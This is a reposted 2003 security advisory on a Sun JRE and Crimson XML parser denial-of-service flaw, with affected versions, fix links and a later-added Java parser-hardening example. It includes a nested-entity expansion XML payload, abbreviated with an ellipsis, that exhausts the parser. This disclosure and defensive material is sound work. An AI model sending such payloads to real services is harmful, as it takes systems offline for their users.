Sun Java XML File Nested Object Denial of Service Vulnerability
Author: nothing (CJSDN senior member; posts: 1636; points: 131)
Posted: 2003-11-05 00:12
Published: 2003-09-22
Updated: 2003-09-22
Severity: High
Threat: Remote denial of service
Error type: Design error
Exploit method: Server mode
BUGTRAQ ID: 8666

Affected systems

Apache Software Foundation Crimson 1.0
Sun JRE (Linux Production Release) 1.2.2_12
Sun JRE (Linux Production Release) 1.2.2_015
Sun JRE (Linux Production Release) 1.2.2_014
Sun JRE (Linux Production Release) 1.2.2_013
Sun JRE (Linux Production Release) 1.2.2_011
Sun JRE (Linux Production Release) 1.2.2_010
Sun JRE (Linux Production Release) 1.2.2_007
Sun JRE (Linux Production Release) 1.2.2_006
Sun JRE (Linux Production Release) 1.2.2_005
    -Debian Linux 2.2
    -MandrakeSoft Linux Mandrake 7.2
    -RedHat Linux 7.0
    -S.u.S.E. Linux 7.0
Sun JRE (Linux Production Release) 1.2.2_004
Sun JRE (Linux Production Release) 1.2.2_003
Sun JRE (Linux Production Release) 1.2.2
Sun JRE (Linux Production Release) 1.3.0_05
Sun JRE (Linux Production Release) 1.3.0_04
Sun JRE (Linux Production Release) 1.3.0_03
Sun JRE (Linux Production Release) 1.3.0_02
Sun JRE (Linux Production Release) 1.3.0_01
Sun JRE (Linux Production Release) 1.3.0
Sun JRE (Linux Production Release) 1.3.1_07
Sun JRE (Linux Production Release) 1.3.1_06
Sun JRE (Linux Production Release) 1.3.1_05
Sun JRE (Linux Production Release) 1.3.1_03
    +Macromedia ColdFusion Server MX Developer
    +Macromedia ColdFusion Server MX Enterprise
    +Macromedia ColdFusion Server MX Professional
Sun JRE (Linux Production Release) 1.3.1_02
Sun JRE (Linux Production Release) 1.3.1_01
Sun JRE (Linux Production Release) 1.3.1
Sun JRE (Linux Production Release) 1.4.0_04
Sun JRE (Linux Production Release) 1.4.0_03
Sun JRE (Linux Production Release) 1.4.0_02
Sun JRE (Linux Production Release) 1.4
Sun JRE (Linux Production Release) 1.4.1_03
Sun JRE (Linux Production Release) 1.4.1_02
Sun JRE (Linux Production Release) 1.4.1_01
    +Opera Software Opera Web Browser 7.11
Sun JRE (Linux Production Release) 1.4.1
Sun JRE (Solaris Production Release) 1.1.6
    +Sun Solaris 2.6
    +Sun Solaris 2.6_x86
    +Sun Solaris 7.0
    +Sun Solaris 7.0_x86
    +Sun Solaris 8.0
    +Sun Solaris 8.0_x86
Sun JRE (Solaris Production Release) 1.1.7B
    +Sun Solaris 2.6
    +Sun Solaris 2.6_x86
    +Sun Solaris 7.0
    +Sun Solaris 7.0_x86
    +Sun Solaris 8.0
    +Sun Solaris 8.0_x86
Sun JRE (Solaris Production Release) 1.1.8_14
Sun JRE (Solaris Production Release) 1.1.8_13
Sun JRE (Solaris Production Release) 1.1.8_009
Sun JRE (Solaris Production Release) 1.1.8
Sun JRE (Solaris Production Release) 1.2
Sun JRE (Solaris Production Release) 1.2.1
    +Sun Solaris 2.6
    +Sun Solaris 2.6_x86
    +Sun Solaris 7.0
    +Sun Solaris 7.0_x86
    +Sun Solaris 8.0
    +Sun Solaris 8.0_x86
Sun JRE (Solaris Production Release) 1.2.2_11
Sun JRE (Solaris Production Release) 1.2.2_11
Sun JRE (Solaris Production Release) 1.2.2_014
Sun JRE (Solaris Production Release) 1.2.2_013
Sun JRE (Solaris Production Release) 1.2.2_012
Sun JRE (Solaris Production Release) 1.2.2_011
Sun JRE (Solaris Production Release) 1.2.2_010
Sun JRE (Solaris Production Release) 1.2.2
Sun JRE (Solaris Production Release) 1.3.0_05
Sun JRE (Solaris Production Release) 1.3.0_02
Sun JRE (Solaris Production Release) 1.3
Sun JRE (Solaris Production Release) 1.3.1_07
Sun JRE (Solaris Production Release) 1.3.1_06
Sun JRE (Solaris Production Release) 1.3.1_05
Sun JRE (Solaris Production Release) 1.3.1_04
Sun JRE (Solaris Production Release) 1.3.1_03
    +Macromedia ColdFusion Server MX Developer
    +Macromedia ColdFusion Server MX Enterprise
    +Macromedia ColdFusion Server MX Professional
Sun JRE (Solaris Production Release) 1.3.1_02
Sun JRE (Solaris Production Release) 1.3.1_01
Sun JRE (Solaris Production Release) 1.4.0_04
Sun JRE (Solaris Production Release) 1.4.0_04
Sun JRE (Solaris Production Release) 1.4.0_03
Sun JRE (Solaris Production Release) 1.4.0_02
Sun JRE (Solaris Production Release) 1.4.0_01
Sun JRE (Solaris Production Release) 1.4
Sun JRE (Solaris Production Release) 1.4.1_03
Sun JRE (Solaris Production Release) 1.4.1_02
Sun JRE (Solaris Production Release) 1.4.1_01
    +Opera Software Opera Web Browser 7.11
Sun JRE (Solaris Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.1.8_009
Sun JRE (Windows Production Release) 1.1.8_008
Sun JRE (Windows Production Release) 1.1.8_007
Sun JRE (Windows Production Release) 1.1.8
Sun JRE (Windows Production Release) 1.2
Sun JRE (Windows Production Release) 1.2.1
Sun JRE (Windows Production Release) 1.2.2_12
Sun JRE (Windows Production Release) 1.2.2_015
Sun JRE (Windows Production Release) 1.2.2_014
Sun JRE (Windows Production Release) 1.2.2_013
Sun JRE (Windows Production Release) 1.2.2_011
Sun JRE (Windows Production Release) 1.2.2_010
Sun JRE (Windows Production Release) 1.2.2
Sun JRE (Windows Production Release) 1.3.0_05
Sun JRE (Windows Production Release) 1.3.0_04
Sun JRE (Windows Production Release) 1.3.0_02
Sun JRE (Windows Production Release) 1.3
Sun JRE (Windows Production Release) 1.3.1_07
Sun JRE (Windows Production Release) 1.3.1_06
Sun JRE (Windows Production Release) 1.3.1_05
Sun JRE (Windows Production Release) 1.3.1_04
Sun JRE (Windows Production Release) 1.3.1_03
    +Macromedia ColdFusion Server MX Developer
    +Macromedia ColdFusion Server MX Enterprise
    +Macromedia ColdFusion Server MX Professional
Sun JRE (Windows Production Release) 1.3.1_02
Sun JRE (Windows Production Release) 1.3.1_01a
Sun JRE (Windows Production Release) 1.3.1_01
Sun JRE (Windows Production Release) 1.4.0_04
Sun JRE (Windows Production Release) 1.4.0_03
Sun JRE (Windows Production Release) 1.4.0_02
Sun JRE (Windows Production Release) 1.4.0_01
Sun JRE (Windows Production Release) 1.4
Sun JRE (Windows Production Release) 1.4.1_03
Sun JRE (Windows Production Release) 1.4.1_02
Sun JRE (Windows Production Release) 1.4.1_01
    +Opera Software Opera Web Browser 7.11
    +Opera Software Opera Web Browser 7.11 j
Sun JRE (Windows Production Release) 1.4.1

Unaffected systems

Apache Software Foundation Crimson 1.1
Sun JRE (Linux Production Release) 1.4.2
Sun JRE (Solaris Production Release) 1.4.2
Sun JRE (Windows Production Release) 1.4.2

Detailed description

Sun Java has a vulnerability when processing XML files that contain a particular structure. An attacker can have Sun Java parse a malformed XML file and cause it to crash.

Test code

    <?xml version="1.0" encoding ="UTF-8"?>
    <!DOCTYPE foobar[
    <!ENTITY x100 "foobar">
    <!ENTITY x99 "&x100;&x100;">
    <!ENTITY x98 "&x99;&x99;">
    ...
    <!ENTITY x2 "&x3;&x3;">
    <!ENTITY x1 "&x2;&x2;">
    ]>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV=...>
    <SOAP-ENV:Body>
    <ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="...">
    <foobar xsi:type="xsd:string">&x1;</foobar>
    </ns1:aaa>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>

Solution

The vendor has fixed this issue in the new version of J2SE:
http://java.sun.com/j2se/

Related information

Release Notes Version 1.4.2
http://java.sun.com/j2se/1.4.2/relnotes.html#JAXP_security

You can dodge the monsters, but you can't dodge the thrill
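The nested-entity test document in the post above is what a service-side parser has to refuse before expansion begins. The following is an added example, not part of the original post or of Sun's fix: it assumes a current JDK with its built-in JAXP parser, the class name HardenedXmlParse is hypothetical, and the three-level entity document is a constructed, harmless sample of the same shape.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical class name; illustrative hardening for a service that parses untrusted XML.
public class HardenedXmlParse {
    // Constructed sample: only three entity levels, so it is harmless if expanded.
    static final String NESTED =
          "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
        + "<!DOCTYPE foobar [\n"
        + "  <!ENTITY x3 \"foobar\">\n"
        + "  <!ENTITY x2 \"&x3;&x3;\">\n"
        + "  <!ENTITY x1 \"&x2;&x2;\">\n"
        + "]>\n"
        + "<foobar>&x1;</foobar>";
    // Constructed sample: ordinary request body without a DOCTYPE.
    static final String PLAIN = "<foobar>hello</foobar>";

    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // JAXP secure processing: the parser enforces its entity-expansion limits.
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // SOAP-style payloads need no DTD, so reject any DOCTYPE outright.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Returns true if the document parses, false if the hardened parser refuses it.
    static boolean accepts(String xml) throws Exception {
        try {
            hardenedBuilder().parse(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return true;
        } catch (SAXException e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("plain accepted:  " + accepts(PLAIN));
        System.out.println("nested accepted: " + accepts(NESTED));
    }
}
```

Rejecting the DOCTYPE is the stricter of the two controls; where a DTD is genuinely required, secure processing alone still bounds the number of entity expansions.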